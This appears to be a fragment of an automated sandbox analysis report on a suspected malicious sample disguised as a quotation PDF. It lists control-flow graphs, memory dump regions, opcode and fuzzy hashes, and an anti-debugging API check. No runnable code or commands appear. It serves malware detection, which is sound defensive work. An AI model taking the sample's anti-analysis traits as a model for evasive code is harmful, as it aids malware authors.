7200e45-7200e4b 588->596 597 7200e5b 588->597 589->518 601 7200ef2-7200f03 589->601 592 7200ed5 590->592 593 7200ed7-7200ed9 590->593 592->589 593->589 598 7200e4d 596->598 599 7200e4f-7200e51 596->599 597->465 598->597 599->597 604 7200f05-7200f0b 601->604 605 7200f1b 601->605 607 7200f0d 604->607 608 7200f0f-7200f11 604->608 605->465 606->543 607->605 608->605
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Pl^q$$^q
                                                    • API String ID: 0-2677662154
                                                    • Opcode ID: 141857f5f730b912178e4bfe3df267d3ac268b28ae1723cb1d38a12538d67f3d
                                                    • Instruction ID: 3332788ca9bd6e7b672984074e88d013e0c77323b30d41e3aa2ec457dc2f71e8
                                                    • Opcode Fuzzy Hash: 141857f5f730b912178e4bfe3df267d3ac268b28ae1723cb1d38a12538d67f3d
                                                    • Instruction Fuzzy Hash: 84322AB4B1020A8FDB24DF29C484B6A77E6FF89701F1584A9D505DB3A2DB71EC41CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 612 7480196 709 748019c call 7488cd0 612->709 710 748019c call 7488cc1 612->710 613 74801a2-74801a8 711 74801ae call 7488d18 613->711 712 74801ae call 7488d09 613->712 614 74801b4-74801e8 615 74801ea-74801f5 614->615 616 74801f7-7480200 614->616 615->616 617 7480209-748020a 616->617 618 7480202 616->618 629 7480397-748045a 617->629 618->617 619 74804a9-74804bd 618->619 620 748059b-74805b0 618->620 621 748030e-7480339 618->621 622 748020f 618->622 623 748034f-7480381 618->623 624 748048f-7480493 618->624 625 7480470-7480471 618->625 626 74802b1 618->626 627 74804c2-748050b 618->627 628 7480476-748047d 618->628 618->629 635 74805b2-74805b9 619->635 620->635 621->616 632 748033f-748034a 621->632 705 7480215 call 7488d90 622->705 706 7480215 call 7488da0 622->706 623->616 634 7480387-7480392 623->634 624->620 633 7480499-74804a4 624->633 630 7480516 625->630 713 74802b7 call 7488d50 626->713 714 74802b7 call 7488d60 626->714 627->630 628->627 631 748047f-748048a 628->631 629->616 666 7480460-748046b 629->666 707 748051c call 7488d90 630->707 708 748051c call 7488da0 630->708 631->616 632->616 633->616 634->616 640 74805bb-74805dd 635->640 641 7480604-7480630 635->641 636 74802bd-74802f8 636->616 643 74802fe-7480309 636->643 637 748021b-748029d 637->616 664 74802a3-74802ac 637->664 644 74805ec-74805f5 640->644 645 74805df-74805ea 640->645 641->644 655 7480632-748063b 641->655 642 7480522-7480546 654 7480551-7480596 642->654 643->616 646 74805fe-74805ff 644->646 647 74805f7 644->647 645->644 652 748063d 646->652 653 7480601-7480602 646->653 647->641 647->652 647->653 658 748063e-74806c6 652->658 653->658 654->616 655->644 668 74806c8 658->668 669 74806cf-7481a71 658->669 664->616 666->616 668->641 668->652 668->653 668->669 672 74800c5-74800ce 669->672 673 7481a77-7481a82 669->673 674 74800d0-7481378 672->674 675 74800d7-74811b3 672->675 673->672 674->672 684 748137e-7481389 674->684 678 74811b5-74811bb 675->678 679 74811c1-74811ca 678->679 682 74811cc 679->682 683 74811d3-74811d4 679->683 682->683 685 7481258-74812a6 682->685 686 74811d9-748120b 682->686 687 748121a-748121e 682->687 688 74812ff-7481300 682->688 689 74812c2-74812c3 682->689 690 7481503-7481504 682->690 691 7481305-7481307 682->691 692 74812c5-74812e9 682->692 683->691 684->672 715 74812a9 call 7485468 685->715 716 74812a9 call 7485470 685->716 686->679 694 748120d-7481218 686->694 687->686 696 7481220-7481242 687->696 695 748138e-748139a 688->695 689->691 690->695 691->695 697 7481a87-7481aaa 691->697 692->679 693 74812ef-74812fa 692->693 693->679 694->679 696->679 698 7481248-7481253 696->698 697->672 699 7481ab0-7481ab9 697->699 698->679 699->672 704 74812ab-74812bd 704->678 705->637 706->637 707->642 708->642 709->613 710->613 711->614 712->614 713->636 714->636 715->704 716->704
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: OgD$puT
                                                    • API String ID: 0-340461722
                                                    • Opcode ID: 5517858ab3e80b18cf6ff93e4712f9de4ce91a93ddb4f7f1610902942d62f103
                                                    • Instruction ID: b882592e07a72faf3aa8d27cb0afe0b36dab1ef96f1be95d96819288220d3071
                                                    • Opcode Fuzzy Hash: 5517858ab3e80b18cf6ff93e4712f9de4ce91a93ddb4f7f1610902942d62f103
                                                    • Instruction Fuzzy Hash: AFC1B3B4A5121CCFCBA4EF28D898BE9B7F1EB49314F1045EAD409A72A0DB755E85CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 988 720cdb8-720cdce 989 720cdd0-720cde7 988->989 990 720cde9-720cdf5 988->990 992 720ce0f-720ce2e 989->992 991 720cdf7-720ce0c 990->991 990->992 991->992 994 720ce30-720ce40 992->994 995 720ce77-720ce7b 992->995 997 720ce42 994->997 998 720ce48-720ce4e 994->998 999 720ce9d-720cea3 995->999 1000 720ce7d-720ce81 995->1000 997->995 1003 720ce44-720ce46 997->1003 998->995 1001 720cea5-720cea9 999->1001 1002 720ceab-720ceb1 999->1002 1000->999 1004 720ce83-720ce9b 1000->1004 1001->1002 1005 720ceb4-720cee1 1001->1005 1003->995 1003->998 1004->999 1007 720ce50-720ce60 1004->1007 1013 720cee3 1005->1013 1014 720cefe-720cf00 1005->1014 1007->995 1009 720ce62-720ce74 1007->1009 1009->995 1016 720cee4-720cef4 1013->1016 1015 720cf02-720cf09 1014->1015 1014->1016 1017 720cf26 1015->1017 1018 720cf0b-720cf25 1015->1018 1157 720cef6 call 720caf0 1016->1157 1158 720cef6 call 720cdb8 1016->1158 1020 720cf34-720cf3f 1017->1020 1021 720cf28-720cf2c 1017->1021 1018->1017 1019 720cefc 1026 720cf41-720cf4c 1020->1026 1027 720cf56-720cf5a 1020->1027 1022 720cf32 1021->1022 1023 720cfae-720cfe8 1021->1023 1022->1020 1038 720d006-720d007 1023->1038 1039 720cfeb-720d005 1023->1039 1031 720cf51-720cf54 1026->1031 1028 720cf82 1027->1028 1029 720cf5c-720cf80 1027->1029 1033 720cf8b-720cfab 1028->1033 1029->1028 1029->1033 1031->1033 1040 720d0c8-720d101 1038->1040 1041 720d009-720d013 1038->1041 1039->1038 1058 720d103-720d11d 1040->1058 1059 720d11e-720d129 1040->1059 1042 720d015-720d018 1041->1042 1043 720d03d-720d04e 1041->1043 1044 720d093-720d0c1 1042->1044 1045 720d01a-720d03c 1042->1045 1049 720d050 1043->1049 1050 720d056-720d05a 1043->1050 1044->1040 1052 720d062-720d092 1049->1052 1053 720d052-720d054 1049->1053 1050->1052 1053->1050 1053->1052 1058->1059 1062 720d153-720d181 1059->1062 1063 720d12b-720d152 1059->1063 1068 720d183-720d19d 1062->1068 1069 720d19e 1062->1069 1068->1069 1070 720d1e0-720d1f7 1069->1070 1071 720d1a0-720d1a1 1069->1071 1074 720d203-720d216 1070->1074 1075 720d1f9-720d1fe 1070->1075 1072 720d1b1-720d1b5 1071->1072 1073 720d1a3-720d1ac call 720cdb8 1071->1073 1077 720d1b7-720d1c6 1072->1077 1078 720d1cb-720d1dc 1072->1078 1073->1072 1080 720d568-720d586 1074->1080 1081 720d21c-720d228 1074->1081 1079 720d560-720d567 1075->1079 1077->1079 1078->1070 1082 720d6da-720d725 1078->1082 1089 720d58d-720d5ab 1080->1089 1081->1082 1083 720d22e-720d265 1081->1083 1085 720d271-720d275 1083->1085 1086 720d267-720d26c 1083->1086 1088 720d27b-720d287 1085->1088 1085->1089 1086->1079 1088->1082 1090 720d28d-720d2c4 1088->1090 1095 720d5b2-720d5d0 1089->1095 1092 720d2d0-720d2d4 1090->1092 1093 720d2c6-720d2cb 1090->1093 1092->1095 1096 720d2da-720d2e6 1092->1096 1093->1079 1103 720d5d7-720d5f5 1095->1103 1096->1082 1098 720d2ec-720d323 1096->1098 1101 720d325-720d32a 1098->1101 1102 720d32f-720d333 1098->1102 1101->1079 1102->1103 1104 720d339-720d345 1102->1104 1113 720d5fc-720d61a 1103->1113 1104->1082 1107 720d34b-720d382 1104->1107 1109 720d384-720d389 1107->1109 1110 720d38e-720d392 1107->1110 1109->1079 1112 720d398-720d3a4 1110->1112 1110->1113 1112->1082 1115 720d3aa-720d3e1 1112->1115 1120 720d621-720d63f 1113->1120 1117 720d3e3-720d3e8 1115->1117 1118 720d3ed-720d3f1 1115->1118 1117->1079 1118->1120 1121 720d3f7-720d403 1118->1121 1127 720d646-720d664 1120->1127 1121->1082 1122 720d409-720d440 1121->1122 1124 720d442-720d447 1122->1124 1125 720d44c-720d450 1122->1125 1124->1079 1125->1127 1128 720d456-720d462 1125->1128 1136 720d66b-720d689 1127->1136 1128->1082 1130 720d468-720d49f 1128->1130 1133 720d4a1-720d4a6 1130->1133 1134 720d4ab-720d4af 1130->1134 1133->1079 1135 720d4b5-720d4c1 1134->1135 1134->1136 1135->1082 1139 720d4c7-720d4fe 1135->1139 1144 720d690-720d6ae 1136->1144 1140 720d500-720d505 1139->1140 1141 720d507-720d50b 1139->1141 1140->1079 1141->1144 1145 720d511-720d51a 1141->1145 1149 720d6b5-720d6d3 1144->1149 1145->1082 1147 720d520-720d555 1145->1147 1147->1149 1150 720d55b 1147->1150 1149->1082 1150->1079 1157->1019 1158->1019
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq
                                                    • API String ID: 0-149360118
                                                    • Opcode ID: 671772cb2525b5e1164d5892605fa6250c362bc162805303f352d24225453ec0
                                                    • Instruction ID: 27fe08f5affb2cc9ccfe10f688c63464f3b3bbc194095602901d16c09cdd6a74
                                                    • Opcode Fuzzy Hash: 671772cb2525b5e1164d5892605fa6250c362bc162805303f352d24225453ec0
                                                    • Instruction Fuzzy Hash: 4C629AB4B116168FCB15CFA9C494A6EBBF2FF88300F148529D55AD7382DB34E941CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: d94a69444f0ff12d412205f0b3caa8abacd4708622094d5eb8e487ec8c4bbde0
                                                    • Instruction ID: 0c779103cdf3acc1d069a8ed39e092e2e2a8d06a0c27e34c1a8c1f0847ff3c34
                                                    • Opcode Fuzzy Hash: d94a69444f0ff12d412205f0b3caa8abacd4708622094d5eb8e487ec8c4bbde0
                                                    • Instruction Fuzzy Hash: B8F1B2B091521DCFDBA0EF24D898BEDB7F1AB0A304F5095EAD409A7291D7759A86CF00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 074854E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID:
                                                    • API String ID: 3662101638-0
                                                    • Opcode ID: e2b756465a03b600568e55cc16f9b68ab16c139730d5f8745a4dfb26f54f64a0
                                                    • Instruction ID: 3a846686ad948c1669ad89da6765bf4f6f884c7b628d6a14b73104aef48440d5
                                                    • Opcode Fuzzy Hash: e2b756465a03b600568e55cc16f9b68ab16c139730d5f8745a4dfb26f54f64a0
                                                    • Instruction Fuzzy Hash: A2216DB19003498FDB14DFAAC4457EEFBF5AF89320F14842ED459A7280DB389A45CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58afde5fcf61e0cc7347a8b2081455377d2cd45f7a49b1f418fdce62cd3714b1
                                                    • Instruction ID: f4f160567cfb05a00403e9a36298e52141d131b2ab07a511b518ca23d2b99eff
                                                    • Opcode Fuzzy Hash: 58afde5fcf61e0cc7347a8b2081455377d2cd45f7a49b1f418fdce62cd3714b1
                                                    • Instruction Fuzzy Hash: 4AC15B70D05218CFDB14DFA9E484BADBBF2FB49300F109569D409AB2A5DB759E86CF10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9c37990abf411b2a1bdd8caeff576bfde89d1a91ed452a13a52664a88c4782f
                                                    • Instruction ID: d31d39aaaee0cdbcad6494f427d83bce69650f412b3921446143cbb14f32a743
                                                    • Opcode Fuzzy Hash: b9c37990abf411b2a1bdd8caeff576bfde89d1a91ed452a13a52664a88c4782f
                                                    • Instruction Fuzzy Hash: ADB16DB0E1020ECFDB54DFA9C8857DEBBF6AF89304F54812AD415A7394EB349845CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a8eba3b6cbae1d98d195233c9bfa9a303cbcc38fe614b2dffc58afb911707133
                                                    • Instruction ID: 734d4acb1952b6f0a8d4fe69b10a4f25d4c99207757bfed0d278133e421ffa88
                                                    • Opcode Fuzzy Hash: a8eba3b6cbae1d98d195233c9bfa9a303cbcc38fe614b2dffc58afb911707133
                                                    • Instruction Fuzzy Hash: AFC11570E06208CFDB54DF69D848BADBBF2FB49300F91A5AAD409B7295DB705A81CF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ded00ae86b278f9b54ae65146138b2fd51ea3fe68b64bbcd3a5121aa0549dab
                                                    • Instruction ID: da7b6c5059acb529d53fe0c4efa63cb8f9fd0a9f5c66415f9f6a85a28ecd0a0c
                                                    • Opcode Fuzzy Hash: 3ded00ae86b278f9b54ae65146138b2fd51ea3fe68b64bbcd3a5121aa0549dab
                                                    • Instruction Fuzzy Hash: D7C12670E06208CFDB54DF69D848BADBBF2FB49300F91A5AAD009B7295DB705A81CF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b10f1422bff557b86a56d21d80680d4d23111471e687dd4ca78f33e30f6959c3
                                                    • Instruction ID: 47f034607fe2f87801410e2fdc5723e89055e45c36becd64122a8d7de8ecf58b
                                                    • Opcode Fuzzy Hash: b10f1422bff557b86a56d21d80680d4d23111471e687dd4ca78f33e30f6959c3
                                                    • Instruction Fuzzy Hash: 27B182B0E1020ECFDB50DFA9C8817EEBBF6AF89314F54852AE414A7394EB749845CB41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245816696.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7480000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b06c7e37f51905b95ee96c8becb67ca0db427b9e3c0311064e921464952efc1
                                                    • Instruction ID: 642e2c0b459a6c2c18314d335359aee0f0a7ad052e0394fff2cdeaed1cacf8db
                                                    • Opcode Fuzzy Hash: 3b06c7e37f51905b95ee96c8becb67ca0db427b9e3c0311064e921464952efc1
                                                    • Instruction Fuzzy Hash: 90D104B4956219CFEBA4EF28C955BEDB7B0EB09304F5044EAD409AB3A0C7759E85CF00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2234254603.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb4e0458147008e680dd274c4abd9c0e85fe4e21ba09f8f35845315efc48d5ee
                                                    • Instruction ID: 330c80ad3440e698dd08512683a452a5553d7625968d61ff74e1484e15464f6b
                                                    • Opcode Fuzzy Hash: eb4e0458147008e680dd274c4abd9c0e85fe4e21ba09f8f35845315efc48d5ee
                                                    • Instruction Fuzzy Hash: 8CC10670E06218CFDB54DF69D848BADBBF2FB49300F91A5AAD009B7295DB705A81CF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2245312078.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7310000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bedb797bae6d7cb510c3d8e4dd2e7698fe1b56c92130e3412a1a5d5567ee6c89
                                                    • Instruction ID: cd4068cc6b56e8a66ca5f21eeafcfc03b193cabfd849045235d47e21b19f6c02
                                                    • Opcode Fuzzy Hash: bedb797bae6d7cb510c3d8e4dd2e7698fe1b56c92130e3412a1a5d5567ee6c89
                                                    • Instruction Fuzzy Hash: 875135B1D06209CFEB18DFA9D4447EDBBF6FB4A300F109029D009AB2A8D7B59946CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7202b48-7202b70 2 7202b72-7202bb9 0->2 3 7202bbe-7202bcc 0->3 51 7203015-720301c 2->51 4 7202bdb 3->4 5 7202bce-7202bd9 call 7200a70 3->5 8 7202bdd-7202be4 4->8 5->8 10 7202bea-7202bee 8->10 11 7202ccd-7202cd1 8->11 13 7202bf4-7202bf8 10->13 14 720301d-7203045 10->14 15 7202cd3-7202ce2 11->15 16 7202d27-7202d31 11->16 17 7202c0a-7202c68 call 72007b0 call 7201218 13->17 18 7202bfa-7202c04 13->18 24 720304c-7203076 14->24 26 7202ce6-7202ceb 15->26 19 7202d33-7202d42 16->19 20 7202d6a-7202d90 16->20 58 72030db-7203105 17->58 59 7202c6e-7202cc8 17->59 18->17 18->24 35 7202d48-7202d65 19->35 36 720307e-7203094 19->36 43 7202d92-7202d9b 20->43 44 7202d9d 20->44 24->36 30 7202ce4 26->30 31 7202ced-7202d22 call 7202a18 26->31 30->26 31->51 35->51 61 720309c-72030d4 36->61 50 7202d9f-7202dc7 43->50 44->50 63 7202e98-7202e9c 50->63 64 7202dcd-7202de6 50->64 68 7203107-720310d 58->68 69 720310f-7203115 58->69 59->51 61->58 70 7202f16-7202f20 63->70 71 7202e9e-7202eb7 63->71 64->63 88 7202dec-7202dfb 64->88 68->69 76 7203116-7203153 68->76 73 7202f22-7202f2c 70->73 74 7202f7d-7202f86 70->74 71->70 92 7202eb9-7202ec8 71->92 89 7202f32-7202f44 73->89 90 7202f2e-7202f30 73->90 78 7202f88-7202fb6 74->78 79 7202fbe-720300b 74->79 78->79 97 7203013 79->97 104 7202e13-7202e28 88->104 105 7202dfd-7202e03 88->105 94 7202f46-7202f48 89->94 90->94 110 7202ee0-7202eeb 92->110 111 7202eca-7202ed0 92->111 101 7202f76-7202f7b 94->101 102 7202f4a-7202f4e 94->102 97->51 101->73 101->74 106 7202f50-7202f69 102->106 107 7202f6c-7202f6f 102->107 116 7202e2a-7202e56 104->116 117 7202e5c-7202e65 104->117 112 7202e05 105->112 113 7202e07-7202e09 105->113 106->107 107->101 110->58 122 7202ef1-7202f14 110->122 120 7202ed2 111->120 121 7202ed4-7202ed6 111->121 112->104 113->104 116->61 116->117 117->58 119 7202e6b-7202e92 117->119 119->63 119->88 120->110 121->110 122->70 122->92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq$Hbq$Hbq
                                                    • API String ID: 0-2297679979
                                                    • Opcode ID: d1976ee83b0d9de6b8c13fdb1efd065be2681f1327da84e85e61eb6eecb92db6
                                                    • Instruction ID: 4628f735755671e0c3a401800a7a78a6285cbf3f58ba7b7d7ad189ec28b0fa0a
                                                    • Opcode Fuzzy Hash: d1976ee83b0d9de6b8c13fdb1efd065be2681f1327da84e85e61eb6eecb92db6
                                                    • Instruction Fuzzy Hash: 3A125FB1A10215DFCB24DFA9C48566EBBF2FF88300F14852DD506AB792DB35AD45CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 134 7204800-720483d call 7204d20 136 720485f-7204875 call 7204608 134->136 137 720483f-7204842 134->137 143 7204beb-7204bff 136->143 144 720487b-7204887 136->144 250 7204844 call 7205170 137->250 251 7204844 call 7205161 137->251 252 7204844 call 7205118 137->252 139 720484a-720484c 139->136 141 720484e-7204856 139->141 141->136 151 7204c3f-7204c48 143->151 145 72049b8-72049bf 144->145 146 720488d-7204890 144->146 148 72049c5-72049ce 145->148 149 7204aee-7204b2b call 7204010 call 7206fb0 145->149 150 7204893-720489c 146->150 148->149 152 72049d4-7204ae0 call 7204010 call 72045a0 call 7204010 148->152 194 7204b31-7204be2 call 7204010 149->194 154 7204ce0 150->154 155 72048a2-72048b6 150->155 158 7204c4a-7204c51 151->158 159 7204c0d-7204c16 151->159 245 7204ae2 152->245 246 7204aeb-7204aec 152->246 157 7204ce5-7204ce9 154->157 171 72049a8-72049b2 155->171 172 72048bc-7204951 call 7204608 * 2 call 7204010 call 72045a0 call 7204648 call 72046f0 call 7204758 155->172 164 7204cf4 157->164 165 7204ceb 157->165 161 7204c53-7204c96 call 7204010 158->161 162 7204c9f-7204ca6 158->162 159->154 163 7204c1c-7204c2e 159->163 161->162 167 7204ca8-7204cb8 162->167 168 7204ccb-7204cde 162->168 181 7204c30-7204c35 163->181 182 7204c3e 163->182 177 7204cf5 164->177 165->164 167->168 184 7204cba-7204cc2 167->184 168->157 171->145 171->150 224 7204970-72049a3 call 7204758 172->224 225 7204953-720496b call 72046f0 call 7204010 call 72042c0 172->225 177->177 253 7204c38 call 7207740 181->253 254 7204c38 call 7207750 181->254 182->151 184->168 194->143 224->171 225->224 245->246 246->149 250->139 251->139 252->139 253->182 254->182
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q$4'^q$4'^q
                                                    • API String ID: 0-1196845430
                                                    • Opcode ID: 1c3432ccdf130c34b7d8f86ce2261928cf7ad164956f99d4bcba6c05505daec5
                                                    • Instruction ID: b6a7051faf0133209067e01c2e3aea78a527fab2a9c5ab5cbe24c3e1df49e77a
                                                    • Opcode Fuzzy Hash: 1c3432ccdf130c34b7d8f86ce2261928cf7ad164956f99d4bcba6c05505daec5
                                                    • Instruction Fuzzy Hash: 51F1FF74A10158CFCB08EFA4D995E9DBBB2FF89300F118158E905AB3A5DB71EC42CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 255 72091e0-72091f0 256 72091f6-72091fa 255->256 257 7209309-720932e 255->257 258 7209200-7209209 256->258 259 7209335-720935a 256->259 257->259 260 7209361-7209397 258->260 261 720920f-7209236 258->261 259->260 278 720939e-72093f4 260->278 272 720923c-720923e 261->272 273 72092fe-7209308 261->273 275 7209240-7209243 272->275 276 720925f-7209261 272->276 277 7209249-7209253 275->277 275->278 279 7209264-7209268 276->279 277->278 281 7209259-720925d 277->281 293 72093f6-720940a 278->293 294 7209418-720942f 278->294 282 72092c9-72092d5 279->282 283 720926a-7209279 279->283 281->276 281->279 282->278 284 72092db-72092f8 282->284 283->278 288 720927f-72092c6 283->288 284->272 284->273 288->282 369 720940d call 7209a58 293->369 370 720940d call 72098f8 293->370 303 7209520-7209530 294->303 304 7209435-720951b call 7204608 call 7204010 * 2 call 7204648 call 7207e18 call 7204010 call 7206fb0 call 7204eb0 294->304 299 7209413 301 7209643-720964e 299->301 311 7209650-7209660 301->311 312 720967d-720969e call 7204758 301->312 313 7209536-7209610 call 7204608 * 2 call 7204dc0 call 7204010 * 2 call 72042c0 call 7204758 call 7204010 303->313 314 720961e-720963a call 7204010 303->314 304->303 324 7209670-7209678 call 7204eb0 311->324 325 7209662-7209668 311->325 366 7209612 313->366 367 720961b 313->367 314->301 324->312 325->324 366->367 367->314 369->299 370->299
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2243848308.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7200000_QUOTATION_APRQTRA031244#U00faPDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$(bq$Hbq
                                                    • API String ID: 0-2835675688
                                                    • Opcode ID: 02479977ecba337bdfadc48d3418ec6dd60adb6fc3d157608e34deb4479d16c4
                                                    • Instruction ID: e3da5cf4249fad5d999758864fbdaa138b1c8dcea81e74cf885f5175ad4245a6
                                                    • Opcode Fuzzy Hash: 02479977ecba337bdfadc48d3418ec6dd60adb6fc3d157608e34deb4479d16c4
                                                    • Instruction Fuzzy Hash: B3E14374A10209DFCB04EFA4D49499DBBB2FF89310F118559E9466B3A5DB30ED81CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 371 7201218-720122a 372 7201262-7201287 371->372 373 720122c-720124c 371->373 380 720128e-72012e2 372->380 373->380 381 720124e-720125f 373->381 387 72012e8-72012f4 380->387 388 7201389-72013d7 380->388 391 72012f6-72012fd 387->391 392 72012fe-7201312 387->392 400 7201407-720140d 388->400 401 72013d9-72013fd 388->401 396 7201381-7201388 392->396 397 7201314-7201339 392->397 407 720133b-720134d 397->407 408 720137c-720137f 397->408 403 720141f-720142e 400->403 404 720140f-720141c 400->404 401->400 402 72013ff 401->402 402->400 409 7201353-7201355 407->409 408->396 408->397 409->408 410 7201357-7201360 409->410 411 7201362-7201365 410->411 412 720136f-720137b 410->412 411->412
                                                    Strings
                                                    Memory Dump Source
